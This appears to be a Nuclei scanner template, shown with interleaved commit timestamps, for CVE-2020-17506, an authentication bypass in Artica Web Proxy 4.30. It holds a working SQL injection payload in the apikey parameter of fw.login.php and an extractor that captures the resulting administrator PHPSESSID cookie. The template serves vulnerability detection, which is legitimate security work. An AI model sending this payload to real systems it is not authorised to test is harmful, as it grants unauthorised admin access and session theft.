2021-01-02 04:56:15 +00:00
id : CVE-2020-17506
2020-08-20 15:11:34 +00:00
info :
name : Artica Web Proxy 4.30 Authentication Bypass
author : dwisiswant0
severity : critical
2020-08-25 22:43:40 +00:00
description : Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
2021-02-05 19:44:41 +00:00
tags : cve,cve2020
2021-08-18 11:29:20 +00:00
reference : https://blog.max0x4141.com/post/artica_proxy/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2020-17506
cwe-id : CWE-89
2020-08-20 15:11:34 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
2020-08-24 04:39:40 +00:00
redirects : true
max-redirects : 1
2020-08-20 15:11:34 +00:00
matchers-condition : and
matchers :
2020-08-24 04:39:40 +00:00
- type : word
words :
- "artica-applianc"
2020-08-20 15:11:34 +00:00
- type : status
status :
- 200
- 301
- 302
condition : or
- type : word
2020-08-20 15:49:36 +00:00
name : session
2020-08-20 15:11:34 +00:00
words :
- "PHPSESSID"
part : header
extractors :
- type : kval
kval :
2020-08-25 22:43:40 +00:00
- "PHPSESSID"